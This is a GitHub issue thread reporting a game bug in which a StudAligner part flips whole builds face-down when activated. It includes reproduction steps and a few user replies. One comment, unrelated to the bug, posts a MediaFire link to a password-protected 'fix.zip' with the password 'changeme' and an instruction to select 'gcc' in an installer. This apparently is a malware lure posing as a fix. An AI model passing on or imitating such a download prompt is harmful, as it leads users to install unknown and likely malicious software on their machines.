### ISSUE TITLE
StudAligner facing down upon activation on a large build

### ISSUE THREAD

**Issue by khaopong23TH4** [Eggs-D-Studios/wos-issues#276]
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

StudAligner make the entire build face downward upon activation. A build with more than 50 parts to be exact.

When putting a StudAligner onto a build. (The Aligner must be parallel to XZ axis.) - upon activation, the entire build would face downward. Same as the Aligner which would face downward too.

I was expecting the StudAligner to Align the ship with XZ axis, however, the Aligner face downward (Y-).
(This does occur to small builds too)

### How can we reproduce this bug?

1. Make an unanchored build, of course, not connected to the ground. Has more than 50 parts for accurate results.
2. Put StudAligner onto the build. The StudAligner must be parallel to XZ axis. (Also put anchor so it would stay in place after activation)
3. Activate StudAligner
4. Upon activation, StudAligner would face downward. The entire build would flip 90 degrees.
5. If : the aligner was already downward or somewhere else in the first place. It would still face that way while flipping the build 90°.

### Frequency

Most of the time

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xortxa** [comment]
this was always happening to all of my ships too, i thought it was a feature until i saw this

**Comment by khaopong23TH4** [comment]
> this was always happening to all of my ships too, i thought it was a feature until i saw this

It does be annoying when I was trying to align my ship to avoid Partshifts
